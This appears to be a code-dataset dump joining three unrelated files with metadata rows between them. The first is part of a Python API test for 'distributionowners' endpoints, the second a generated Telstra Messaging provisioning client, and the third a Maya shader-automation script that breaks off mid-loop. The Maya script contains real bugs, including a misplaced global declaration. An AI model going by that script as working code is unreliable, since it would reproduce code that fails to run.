self.assertEqual(code, 500)
# check it has NOT BEEN ADDED
result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/distributionowners', {'cookie':session_cookie}, {}, {})
self.assertEqual(len(result.json), nbDistributionOwner)
# creates a new DO -> correct values & no reference address
result, code = appsrc.tests.utils.HTTP_POST(variables.DEFAULT_API_URL + '/distributionowners',
{'cookie':session_cookie},
{},
ujson.dumps({"name":"correct", "logoUrl":"www.google.fr", "telephone":"01232132131", "email":"test@test.com", "refAddressId":""}))
self.assertEqual(code, 500)
# check it has NOT BEEN ADDED
result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/distributionowners', {'cookie':session_cookie}, {}, {})
self.assertEqual(len(result.json), nbDistributionOwner)
result, code = appsrc.tests.utils.HTTP_POST(variables.DEFAULT_API_URL + '/distributionowners',
{'cookie':session_cookie},
{},
ujson.dumps({"name":"correct", "logoUrl":"www.google.fr", "telephone":"01232132131", "email":"test@test.com", "refAddressId":"unknown"}))
self.assertEqual(code, 500)
# check it has NOT BEEN ADDED
result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/distributionowners', {'cookie':session_cookie}, {}, {})
self.assertEqual(len(result.json), nbDistributionOwner)
# creates a new DO -> unicity check on phone numner
result, code = appsrc.tests.utils.HTTP_POST(variables.DEFAULT_API_URL + '/distributionowners',
{'cookie':session_cookie},
{},
ujson.dumps({"name":"correct", "logoUrl":"www.google.fr", "telephone":distributionOwnerList[0]['telephone'], "email":"test@test.com", "refAddressId":distributionOwnerList[0]['address']['id']}))
self.assertEqual(code, 500)
# creates a new DO -> unicity check on email
result, code = appsrc.tests.utils.HTTP_POST(variables.DEFAULT_API_URL + '/distributionowners',
{'cookie':session_cookie},
{},
ujson.dumps({"name":"correct", "logoUrl":"www.google.fr", "telephone":"01232132131", "email":distributionOwnerList[0]['email'], "refAddressId":distributionOwnerList[0]['address']['id']}))
self.assertEqual(code, 500)
result, code = appsrc.tests.utils.HTTP_POST(variables.DEFAULT_API_URL + '/distributionowners',
{'cookie':session_cookie},
{},
ujson.dumps({"name":"correct", "logoUrl":"www.google.fr", "telephone":"01232132131", "email":"test@test.com", "refAddressId":distributionOwnerList[0]['address']['id']}))
self.assertEqual(code, 200)
newDO = result.json['id']
# check list of DO
result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/distributionowners', {'cookie':session_cookie}, {}, {})
self.assertEqual(len(result.json), nbDistributionOwner + 1)
# update duplicate on email
result, code = appsrc.tests.utils.HTTP_PUT(variables.DEFAULT_API_URL + '/distributionowners/' +newDO ,
{'cookie':session_cookie},
{},
ujson.dumps({"email":distributionOwnerList[0]['email']}))
self.assertEqual(code, 500)
# duplicate on telephone
result, code = appsrc.tests.utils.HTTP_PUT(variables.DEFAULT_API_URL + '/distributionowners/' +newDO ,
{'cookie':session_cookie},
{},
ujson.dumps({"telephone":distributionOwnerList[0]['telephone']}))
self.assertEqual(code, 500)
pass
| 56.267045
| 235
| 0.599111
| 966
| 9,903
| 6.015528
| 0.132505
| 0.064361
| 0.093616
| 0.101187
| 0.832043
| 0.822062
| 0.798486
| 0.791774
| 0.789365
| 0.777663
| 0
| 0.017711
| 0.270221
| 9,903
| 175
| 236
| 56.588571
| 0.786357
| 0.090478
| 0
| 0.728682
| 0
| 0
| 0.147072
| 0
| 0
| 0
| 0
| 0
| 0.24031
| 1
| 0.031008
| false
| 0.03876
| 0.046512
| 0
| 0.085271
| 0.007752
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d65eb6e6529d9fa8e21a1ac7031798142e260aec
| 16,953
|
py
|
Python
|
Telstra_Messaging/api/provisioning_api.py
|
telstra/MessagingAPI-SDK-python
|
1f9413a7f43321c84056ce54bc1ac3d626b6bbe2
|
[
"Apache-2.0"
] | 21
|
2017-11-08T04:06:26.000Z
|
2021-01-21T04:58:36.000Z
|
Telstra_Messaging/api/provisioning_api.py
|
telstra/MessagingAPI-SDK-python
|
1f9413a7f43321c84056ce54bc1ac3d626b6bbe2
|
[
"Apache-2.0"
] | 5
|
2017-11-28T17:23:29.000Z
|
2021-10-15T11:11:48.000Z
|
Telstra_Messaging/api/provisioning_api.py
|
telstra/MessagingAPI-SDK-python
|
1f9413a7f43321c84056ce54bc1ac3d626b6bbe2
|
[
"Apache-2.0"
] | 2
|
2020-01-13T04:34:27.000Z
|
2021-08-10T04:10:26.000Z
|
# coding: utf-8
"""
Telstra Messaging API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 2.2.10
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from Telstra_Messaging.api_client import ApiClient
from Telstra_Messaging.exceptions import (
ApiTypeError,
ApiValueError
)
class ProvisioningApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_subscription(self, body, **kwargs): # noqa: E501
"""Create Subscription # noqa: E501
Invoke the provisioning API to get a dedicated mobile number for an account or application. Note that Free Trial apps will have a 30-Day Limit for their provisioned number. If the Provisioning call is made several times within that 30-Day period, it will return the `expiryDate` in the Unix format and will not add any activeDays until after that `expiryDate`. After the `expiryDate`, you may make another Provisioning call to extend the activeDays by another 30-Days. For paid apps, a provisioned number can be allotted for a maximum of 5 years. If a Provisioning call is made which will result to activeDays > 1825, a 409 `Active Days Max` response will be returned to indicate that the provisioned number is already valid for more than 5 years and that no update to activeDays has been made. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_subscription(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param ProvisionNumberRequest body: A JSON payload containing the required attributes (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ProvisionNumberResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_subscription_with_http_info(body, **kwargs) # noqa: E501
def create_subscription_with_http_info(self, body, **kwargs): # noqa: E501
"""Create Subscription # noqa: E501
Invoke the provisioning API to get a dedicated mobile number for an account or application. Note that Free Trial apps will have a 30-Day Limit for their provisioned number. If the Provisioning call is made several times within that 30-Day period, it will return the `expiryDate` in the Unix format and will not add any activeDays until after that `expiryDate`. After the `expiryDate`, you may make another Provisioning call to extend the activeDays by another 30-Days. For paid apps, a provisioned number can be allotted for a maximum of 5 years. If a Provisioning call is made which will result to activeDays > 1825, a 409 `Active Days Max` response will be returned to indicate that the provisioned number is already valid for more than 5 years and that no update to activeDays has been made. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_subscription_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param ProvisionNumberRequest body: A JSON payload containing the required attributes (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ProvisionNumberResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_subscription" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_subscription`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['auth'] # noqa: E501
return self.api_client.call_api(
'/messages/provisioning/subscriptions', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProvisionNumberResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_subscription(self, body, **kwargs): # noqa: E501
"""Delete Subscription # noqa: E501
Delete a mobile number subscription from an account # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_subscription(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param DeleteNumberRequest body: EmptyArr (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_subscription_with_http_info(body, **kwargs) # noqa: E501
def delete_subscription_with_http_info(self, body, **kwargs): # noqa: E501
"""Delete Subscription # noqa: E501
Delete a mobile number subscription from an account # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_subscription_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param DeleteNumberRequest body: EmptyArr (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_subscription" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `delete_subscription`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['auth'] # noqa: E501
return self.api_client.call_api(
'/messages/provisioning/subscriptions', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_subscription(self, **kwargs): # noqa: E501
"""Get Subscription # noqa: E501
Get mobile number subscription for an account # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_subscription(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GetSubscriptionResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_subscription_with_http_info(**kwargs) # noqa: E501
def get_subscription_with_http_info(self, **kwargs): # noqa: E501
"""Get Subscription # noqa: E501
Get mobile number subscription for an account # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_subscription_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GetSubscriptionResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_subscription" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['auth'] # noqa: E501
return self.api_client.call_api(
'/messages/provisioning/subscriptions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetSubscriptionResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 47.354749
| 819
| 0.62284
| 1,944
| 16,953
| 5.229424
| 0.119342
| 0.036199
| 0.044068
| 0.026559
| 0.918454
| 0.910781
| 0.90724
| 0.90724
| 0.90724
| 0.893665
| 0
| 0.015724
| 0.309739
| 16,953
| 357
| 820
| 47.487395
| 0.853017
| 0.51979
| 0
| 0.75974
| 1
| 0
| 0.161028
| 0.055314
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.032468
| 0
| 0.123377
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d66ea6dfd614428f764d25f8a5a861def016b66c
| 199,620
|
py
|
Python
|
Automatic_Materials.py
|
mfischer3d/Automatic_Materials
|
9a4de747443c1f22e022857f809321c9ac2ec0cd
|
[
"CC0-1.0"
] | null | null | null |
Automatic_Materials.py
|
mfischer3d/Automatic_Materials
|
9a4de747443c1f22e022857f809321c9ac2ec0cd
|
[
"CC0-1.0"
] | null | null | null |
Automatic_Materials.py
|
mfischer3d/Automatic_Materials
|
9a4de747443c1f22e022857f809321c9ac2ec0cd
|
[
"CC0-1.0"
] | null | null | null |
""" Automatic Materials 1.1 Created by Michael Fischer
This script imports the images from your projects sourceimages folder,
creates a shader for each material and connects them based off of the file names.
Non color maps are changed to raw, ignore cs rules on and normal maps have bump2d maps / rsnormal maps.
--- USER ADJUSTMENT INSTRUCTIONS ---
Change the default_shader to change the shader the script creates. ex: default_shader = redshift (NO QUOTES)
Change the project_is_set to False to select a file folder instead of the automatic sourceimages folder.
Change object_material_connect to False to disable auto assigning objects to materials based off their names.
Change the image names inside the quotes if you named your files differently. ex: color_text = 'col'
Save the python file to save your settings for next time and add to shelf or a hotkey for easier access.
"""
import maya.cmds as cmds
import maya.mel as mel
arnold = 'aiStandardSurface'
blinn = 'blinn'
phong = 'phong'
redshift = 'RedshiftMaterial'
lambert = 'lambert'
Beckmann = 0
GGX = 1
Ashikhmin = 2
''' CHANGE YOUR DEFAULT SHADER HERE '''
default_shader = redshift #Change the default shader the script creates from any of the above variables. Copy the left side names.
''' Change additional settings here '''
project_is_set = True #True: Searches project's sourceimages for images. False: User selects the folder that will be searched.
object_material_connect = True #True: Assigns matching object and material names. False: Does not assign materials to objects for you.
default_project_image_directory = 'sourceimages' #Change 'sourceimages' to another folder name in your set project.
bumpDepth_def = 0.150 #Change the default bump depth value for your normal maps.
material_suffix = '_mat' #Adds a material suffix to shaders it creates if non in your map names
object_suffix = '_low' #Looks to match object names to shader name ignoring the object_suffix defined here
default_BRDF = GGX #For Redshift pick from Beckmann, GGX or Ashikmin
''' Change your image names here ''' #Refers to the suffix of your images. ex: arm_material_Base_Color is found in color_text.
color_text = 'Color'
color_alt_text = 'Diffuse'
color_alt2_text = 'Albedo'
roughness_text = 'Roughness'
roughness_alt_text = 'Glossiness'
metal_text = "Metal"
metal_alt_text = 'Reflection'
normal_text = 'Normal' #If you have two normal maps for the same material the first normal called is assigned OpenGL, DirectX, Normal.
emissive_text = 'Emissive'
scatter_text = 'Scattering'
opacity_text = 'Opacity' #'opacity' is also already searched for.
opacity_alt_text = 'Alpha'
ior_text = 'IOR' #'IOR' and 'Ior' are also already searched for.
translucency_text = 'Translucency'
dir_total = []
shaders_list = [arnold, blinn, phong, redshift, lambert]
shaders_color_list = ['.baseColor', '.color', '.color', '.diffuse_color', '.color']
node_list = ['RedshiftNormalMap','RedshiftPostEffects','bump2d']
all_nodes_list = shaders_list + node_list
counter = 0
number_of_shaders = len(shaders_list)
default_shadingEngine = 'aiStandardSurface*SG'
basePath = cmds.workspace(q = True, rd = True)
basePath = basePath + default_project_image_directory
i = 'test'
b = 'test'
runit = False
obj_shad_name = 'testt'
default_pano = "C:\Program Files\Allegorithmic\Substance Painter\\resources\shelf\\allegorithmic\environments\Exterior\Panorama.hdr"
ui = True # True or False if you want the ui window or not
if default_shader == arnold:
default_shadingEngine = 'aiStandardSurface*SG'
if default_shader == blinn:
default_shadingEngine = 'blinn*SG'
if default_shader == phong:
default_shadingEngine = 'phong*SG'
if default_shader == redshift:
default_shadingEngine = 'rsMaterial*SG'
if default_shader == lambert:
default_shadingEngine = 'lambert*SG'
def color_space (): #Sets color space of images to raw and ignore cs rules on
cmds.setAttr(i + '.ignoreColorSpaceFileRules', 1)
cmds.setAttr(i + '.cs', 'Raw', type='string')
def color_func (a = '.color'):
try:
cmds.disconnectAttr(connected_1[0] +'.outColor', selected_shader + a)
except:
pass
finally:
cmds.connectAttr(i + '.outColor' ,selected_shader + a)
def color_func2 (a = '.color'):
try:
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
cmds.disconnectAttr(connect_1[0] +'.outColor', selected_shader2 + a)
except:
pass
finally:
cmds.connectAttr(i + '.outColor' ,selected_shader2 + a)
def roughness_func(a = '.specularRoughness'):
try:
cmds.disconnectAttr(connected_2[0] +'.outAlpha', selected_shader + a)
except:
pass
finally:
cmds.connectAttr(i + '.outAlpha' , selected_shader + a)
color_space()
def roughness_func2(a = '.specularRoughness'):
try:
cmds.disconnectAttr(connect_2[0] +'.outAlpha', selected_shader2 + a)
except:
pass
finally:
cmds.connectAttr(i + '.outAlpha' , selected_shader2 + a)
color_space()
def metal_func(a = '.reflectivity'):
try:
cmds.disconnectAttr(connected_3[0] +'.outAlpha', selected_shader + a)
except:
pass
finally:
cmds.connectAttr(i + '.outAlpha' , selected_shader + a)
color_space()
def metal_func2(a = '.reflectivity'):
try:
cmds.disconnectAttr(connect_3[0] +'.outAlpha', selected_shader2 + a)
except:
pass
finally:
cmds.connectAttr(i + '.outAlpha' , selected_shader2 + a)
color_space()
def normal_func(a = '.normalCamera', b = 'bump2d'):
bump = cmds.shadingNode(b, asUtility = True)
try:
cmds.disconnectAttr(connected_4[0] +'.outNormal', selected_shader + a)
cmds.delete(connected_4)[0]
except:
pass
finally:
cmds.connectAttr(i + '.outAlpha' , bump + '.bumpValue')
cmds.connectAttr(bump + '.outNormal' , selected_shader + a)
cmds.setAttr(bump + '.bumpDepth', bumpDepth_def)
color_space()
def normal_func2(a = '.normalCamera', b = 'bump2d'):
bump = cmds.shadingNode(b, asUtility = True)
try:
cmds.disconnectAttr(connect_4[0] +'.outNormal', selected_shader2 + a)
cmds.delete(connected_4)[0]
except:
pass
finally:
cmds.connectAttr(i + '.outAlpha' , bump + '.bumpValue')
cmds.connectAttr(bump + '.outNormal' , selected_shader2 + a)
cmds.setAttr(bump + '.bumpDepth', bumpDepth_def)
color_space()
def rs_normal_func(a = '.bump_input'):
bump2 = cmds.shadingNode('RedshiftNormalMap', asUtility = True)
try:
cmds.disconnectAttr(connected_4[0] +'.outDisplacementVector', selected_shader + a)
cmds.disconnectAttr(connected_4[0] +'.outNormal', selected_shader + a)
except:
pass
finally:
fileNode = cmds.listConnections(i)
currentFile = cmds.getAttr(i + ".fileTextureName" , fileNode[0])
cmds.setAttr(bump2 + '.tex0', currentFile ,type="string")
cmds.connectAttr(bump2 + '.outDisplacementVector', selected_shader + '.bump_input')
def rs_normal_func2(a = '.bump_input'):
bump2 = cmds.shadingNode('RedshiftNormalMap', asUtility = True)
try:
cmds.disconnectAttr(connect_4[0] +'.outDisplacementVector', selected_shader2 + a)
cmds.disconnectAttr(connect_4[0] +'.outNormal', selected_shader2 + a)
except:
pass
finally:
fileNode = cmds.listConnections(i)
currentFile = cmds.getAttr(i + ".fileTextureName" , fileNode[0])
cmds.setAttr(bump2 + '.tex0', currentFile ,type="string")
cmds.connectAttr(bump2 + '.outDisplacementVector', selected_shader2 + '.bump_input')
def vr_normal_func(a = '.bumpMap'):
try:
cmds.disconnectAttr(connected_4[0] +'.outColor', selected_shader + a)
except:
pass
finally:
cmds.connectAttr(i + '.outColor' , selected_shader + a)
color_space()
def vr_normal_func2(a = '.bumpMap'):
try:
cmds.disconnectAttr(connect_4[0] +'.outColor', selected_shader2 + a)
except:
pass
finally:
cmds.connectAttr(i + '.outColor' , selected_shader2 + a)
color_space()
def scatter_func(a = '.subsurface'):
try:
cmds.disconnectAttr(connect_5[0] +'.outAlpha', selected_shader + a)
except:
pass
finally:
cmds.connectAttr(i + '.outAlpha' , selected_shader + a)
color_space()
def scatter_func2(a = '.subsurface'):
try:
cmds.disconnectAttr(connect_5[0] +'.outAlpha', selected_shader2 + a)
except:
pass
finally:
cmds.connectAttr(i + '.outAlpha' , selected_shader2 + a)
color_space()
def emissive_func(a = '.emissionColor'):
try:
cmds.disconnectAttr(connected_6[0] +'.outColor', selected_shader + a)
except:
pass
finally:
cmds.connectAttr(i + '.outColor' , selected_shader + a)
#9 mfis
def emissive_func2(a = '.emissionColor'):
try:
cmds.disconnectAttr(connect_6[0] +'.outColor', selected_shader2 + a)
except:
pass
finally:
cmds.connectAttr(i + '.outColor' , selected_shader2 + a)
def ior_func(a = '.thinFilmIOR'):
try:
cmds.disconnectAttr(connected_7[0] +'.outAlpha', selected_shader + a)
except:
pass
finally:
cmds.connectAttr(i + '.outAlpha' , selected_shader + a)
color_space()
def ior_func2(a = '.thinFilmIOR'):
try:
cmds.disconnectAttr(connect_7[0] +'.outAlpha', selected_shader2 + a)
except:
pass
finally:
cmds.connectAttr(i + '.outAlpha' , selected_shader2 + a)
color_space()
def opacity_func(a = '.transparency'):
try:
cmds.disconnectAttr(connected_8[0] +'.outColor', selected_shader + a)
except:
pass
finally:
cmds.connectAttr(i + '.outColor' , selected_shader + a)
color_space()
def opacity_func2(a = '.transparency'):
try:
cmds.disconnectAttr(connect_8[0] +'.outColor', selected_shader2 + a)
except:
pass
finally:
cmds.connectAttr(i + '.outColor' , selected_shader2 + a)
color_space()
def translucency_func2(a = '.translucency_func2'):
try:
cmds.disconnectAttr(connect_9[0] +'.outColor', selected_shader2 + a)
except:
pass
finally:
cmds.connectAttr(i + '.outColor' , selected_shader2 + a)
color_space()
def delete_shader(a = arnold, b = '.baseColor'):
if default_shader == a:
if cmds.listConnections(selected_shader + b) == None:
cmds.delete(selected_shader)
cmds.delete(shadingEngine)
def arrays_func(a = 0):
try:
for i in dir_array[a]:
dir_total.append(i)
except:
pass
def shader_create_func():
place2d = cmds.shadingNode('place2dTexture', asUtility = True)
text_file = cmds.shadingNode('file', isColorManaged = True, asTexture = True, name = i[:-4])
cmds.connectAttr(place2d +'.outUV', text_file + '.uvCoord')
cmds.setAttr(text_file + '.fileTextureName', basePath + '/' + cut[0] + '/' + i, type = 'string')
cmds.connectAttr(place2d +'.outUvFilterSize',text_file + '.uvFilterSize')
connections = ['rotateUV','offset','noiseUV','vertexCameraOne','vertexUvThree','vertexUvTwo','vertexUvOne',
'repeatUV','wrapV','wrapU','stagger','mirrorU','mirrorV','rotateFrame','translateFrame','coverage']
for c in connections:
cmds.connectAttr(place2d + '.' + c, text_file + '.' + c)
#UI Stuff
def project():
global project_is_set
project_is_set = True
global basePath
basePath = cmds.workspace(q = True, rd = True)
basePath = basePath + default_project_image_directory
def filedirectory():
global project_is_set
project_is_set = False
global basePath
basePath = cmds.fileDialog2(fileMode=2, caption="Import Folder")[0]
def red():
global default_shader
default_shader = redshift
def arn():
global default_shader
default_shader = arnold
def lam():
global default_shader
default_shader = lambert
def pho():
global default_shader
default_shader = phong
def bli():
global default_shader
default_shader = blinn
def obj_match():
global object_material_connect
object_material_connect = True
def obj_no_match():
global object_material_connect
object_material_connect = False
def suffix_func():
global runit
runit = True
def Run_shader():
if default_shader == arnold:
default_shadingEngine = 'aiStandardSurface*SG'
if default_shader == blinn:
default_shadingEngine = 'blinn*SG'
if default_shader == phong:
default_shadingEngine = 'phong*SG'
if default_shader == redshift:
default_shadingEngine = 'rsMaterial*SG'
if default_shader == lambert:
default_shadingEngine = 'lambert*SG'
global material_suffix
material_suffix = '_mat'
if runit == True:
material_suffix = cmds.textField('suffix', query = True, text = True)
if material_suffix == '':
global material_suffix
material_suffix = '_mat'
directory = cmds.getFileList(folder = basePath)
for i in directory:
if '.png' in i or '.jpg' in i or '.jpeg' in i or '.tga' in i or '.tif' in i or 'raw' in i:
if cmds.objExists(i[:-4]):
pass
else:
place2d = cmds.shadingNode('place2dTexture', asUtility = True)
text_file = cmds.shadingNode('file', isColorManaged = True, asTexture = True, name = i[:-4])
cmds.connectAttr(place2d +'.outUV', text_file + '.uvCoord')
cmds.setAttr(text_file + '.fileTextureName', basePath + '/' + i, type = 'string')
cmds.connectAttr(place2d +'.outUvFilterSize',text_file + '.uvFilterSize')
connections = ['rotateUV','offset','noiseUV','vertexCameraOne','vertexUvThree','vertexUvTwo','vertexUvOne',
'repeatUV','wrapV','wrapU','stagger','mirrorU','mirrorV','rotateFrame','translateFrame','coverage']
for c in connections:
cmds.connectAttr(place2d + '.' + c, text_file + '.' + c)
global selected_shader
selected_shader = cmds.shadingNode(default_shader, asShader = True)
global shadingEngine
shadingEngine = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader + '.outColor', shadingEngine + '.surfaceShader')
global selected_shader2
selected_shader2 = selected_shader
arnold_shaders = cmds.ls(type = 'aiStandardSurface')
blinn_shaders = cmds.ls(type = 'blinn')
phong_shaders = cmds.ls(type = 'phong')
lambert_shaders = cmds.ls(type = 'lambert')
redshift_shaders = cmds.ls(type = 'RedshiftMaterial')
#Arnold
if cmds.nodeType(selected_shader) == 'aiStandardSurface':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
global connected_1
connected_1 = cmds.listConnections(selected_shader + my_array[0])
global connected_2
connected_2 = cmds.listConnections(selected_shader + my_array[1])
global connected_3
connected_3 = cmds.listConnections(selected_shader + my_array[2])
global connected_4
connected_4 = cmds.listConnections(selected_shader + my_array[3])
global connected_5
connected_5 = cmds.listConnections(selected_shader + my_array[4])
global connected_6
connected_6 = cmds.listConnections(selected_shader + my_array[5])
global connected_7
connected_7 = cmds.listConnections(selected_shader + my_array[6])
global connected_8
connected_8 = cmds.listConnections(selected_shader + my_array[7])
global connect_1
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
global connect_2
connect_2 = cmds.listConnections(selected_shader2 + my_array[1])
global connect_3
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
global connect_4
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
global connect_5
connect_5 = cmds.listConnections(selected_shader2 + my_array[4])
global connect_6
connect_6 = cmds.listConnections(selected_shader2 + my_array[5])
global connect_7
connect_7 = cmds.listConnections(selected_shader2 + my_array[6])
global connect_8
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(type = 'file')
if default_shader == arnold:
global i
for i in names:
if color_text in i or color_text.lower() in i:
if color_text in i:
cut = i.partition( '_Base' + color_text)
elif color_text.lower() in i:
cut = i.partition( '_base' + color_text.lower())
same_name = False
arnold_shaders = cmds.ls(type = 'aiStandardSurface')
global b
for b in arnold_shaders:
if cut[0] in b:
global selected_shader2
selected_shader2 = b
connect_1
same_name = True
if not cmds.listConnections('{0}.baseColor'.format(b)):
